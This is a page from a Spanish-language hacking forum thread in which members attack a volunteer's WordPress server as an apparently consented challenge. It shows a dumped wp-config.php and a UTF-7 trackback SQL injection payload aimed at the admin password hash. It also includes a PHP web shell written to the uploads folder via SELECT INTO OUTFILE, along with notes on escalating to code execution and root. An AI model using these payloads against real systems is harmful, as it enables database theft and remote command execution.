elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Hack my server II
0 Usuarios y 3 Visitantes están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 Ir Abajo Respuesta Imprimir
Autor Tema: Hack my server II  (Leído 87,193 veces)
#!drvy


Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Hack my server II
« Respuesta #100 en: 1 Agosto 2014, 21:47 pm »

¿El wp_config.php lo puedes ver usando el infile? :O

Se..

Código
  1. <?php
  2. // ** MySQL settings ** //
  3. define('DB_NAME', 'hackme2');    // The name of th...
  4. define('DB_USER', 'root');     // Your MySQL usern...
  5. define('DB_PASSWORD', ''); // ...and password
  6. define('DB_HOST', 'localhost');    // 99% chance y...
  7.  
  8. // You can have multiple installations in one data...
  9. $table_prefix  = 'wp_';   // Only numbers, letters...
  10.  
  11. // Change this to localize WordPress.  A correspon...
  12. // chosen language must be installed to wp-include...
  13. // For example, install de.mo to wp-includes/langu...
  14. // to enable German language support.
  15. define ('WPLANG', '');
  16.  
  17. /* That's all, stop editing! Happy blogging. */
  18.  
  19. define('ABSPATH', dirname(__FILE__).'/');
  20. require_once(ABSPATH.'wp-settings.php');
  21. ?>

Saludos
En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Hack my server II
« Respuesta #101 en: 1 Agosto 2014, 21:52 pm »

@MinusFour como conseguiste ejecutar PHP ?

Saludos
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Hack my server II
« Respuesta #102 en: 1 Agosto 2014, 22:01 pm »

aca va la inyeccion sql que estoy probando:

Código:
charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users limit 1 -- -

Funciona para el select pero para el insert da error, hay que intentar provocar un error forzado como un cast a la columna para que arroje el hash del admin y desde ahi loguear y hacer el directory traversal y comenzar a elevar y ejecutar código. Recuerden que como admin pueden ejecutar código editando una plantilla a pesar de que esta no se guarde con la previsualización, aparte de la ejecución de código en varis archivos extras y desde ahi intentar ejecutar un system y desde ahi elevar privilegios escaneando archivos con permisos de root que puedan ser sobreescribibles (igual como lo hace la c99 shell).

Debo irme a mi casa, adios.
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Hack my server II
« Respuesta #103 en: 1 Agosto 2014, 22:06 pm »

@MinusFour como conseguiste ejecutar PHP ?

Saludos

No lo he podido lograr todavía, por alguna razón no escapa las comillas xD.

Pero está esto:

http://blog.sjinks.pro/wordpress/858-information-disclosure-via-sql-injection-attack/

Por cierto WHK te dejaste la IP en tus logs.

Edit: Noup, por más que lo intento las comillas las escapan y las imprimen, así que me imagino que esa vulnerabilidad no puede ejecutar código php.
« Última modificación: 2 Agosto 2014, 00:20 am por MinusFour » En línea

dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Hack my server II
« Respuesta #104 en: 2 Agosto 2014, 00:08 am »

Carpeta con permisos de escritura, lista!
En línea




WIитX


Desconectado Desconectado

Mensajes: 1.026


WINTX


Ver Perfil WWW
Re: Hack my server II
« Respuesta #105 en: 2 Agosto 2014, 00:10 am »

aca va la inyeccion sql que estoy probando:

Código:
charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users limit 1 -- -

Funciona para el select pero para el insert da error, hay que intentar provocar un error forzado como un cast a la columna para que arroje el hash del admin y desde ahi loguear y hacer el directory traversal y comenzar a elevar y ejecutar código. Recuerden que como admin pueden ejecutar código editando una plantilla a pesar de que esta no se guarde con la previsualización, aparte de la ejecución de código en varis archivos extras y desde ahi intentar ejecutar un system y desde ahi elevar privilegios escaneando archivos con permisos de root que puedan ser sobreescribibles (igual como lo hace la c99 shell).

Debo irme a mi casa, adios.

Que asco dais D: iros de aquí eso no vale ABUSONES!!  :-(


 :P
En línea

"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Hack my server II
« Respuesta #106 en: 2 Agosto 2014, 00:17 am »

Carpeta con permisos de escritura, lista!

¿Entonces ahora podemos escribir en /var/www?

¿No quieres poner una carpeta de uploads con permisos de escritura o cambiar la carpeta de themes y dejarla como de escritura? :)
En línea

dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Hack my server II
« Respuesta #107 en: 2 Agosto 2014, 00:20 am »

Citar
¿Entonces ahora podemos escribir en /var/www?

¿No quieres poner una carpeta de uploads con permisos de escritura o cambiar la carpeta de themes y dejarla como de escritura


No. Sólo la carpeta uploads de WP...
En línea




xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: Hack my server II
« Respuesta #108 en: 2 Agosto 2014, 00:30 am »

Ya he copiado un un acceso a la shell

-> c.php?cmd=

SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>'
INTO OUTFILE  '/var/www/wp-content/uploads/c.php'
En línea

dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Hack my server II
« Respuesta #109 en: 2 Agosto 2014, 00:36 am »

Como subiste la Shell? :-)
En línea




Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Counter Strike 1.5 Hack Server
Juegos y Consolas
*StoW* 0 3,679 Último mensaje 19 Octubre 2006, 22:22 pm
por *StoW*
Internal Server Error(hack web cross)
WarZone
Angbroda 5 6,399 Último mensaje 3 Marzo 2009, 17:39 pm
por © Shadoweps ツ
Torneo Hack my Server « 1 2 ... 6 7 »
Foro Libre
dimitrix 62 23,122 Último mensaje 1 Agosto 2014, 03:04 am
por dimitrix
Hack My Server III « 1 2 »
Foro Libre
dimitrix 16 6,636 Último mensaje 30 Marzo 2015, 18:47 pm
por elmatador2
Hack my server 2018 « 1 2 »
Hacking
dimitrix 16 19,762 Último mensaje 28 Mayo 2018, 22:06 pm
por hitori batusai
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines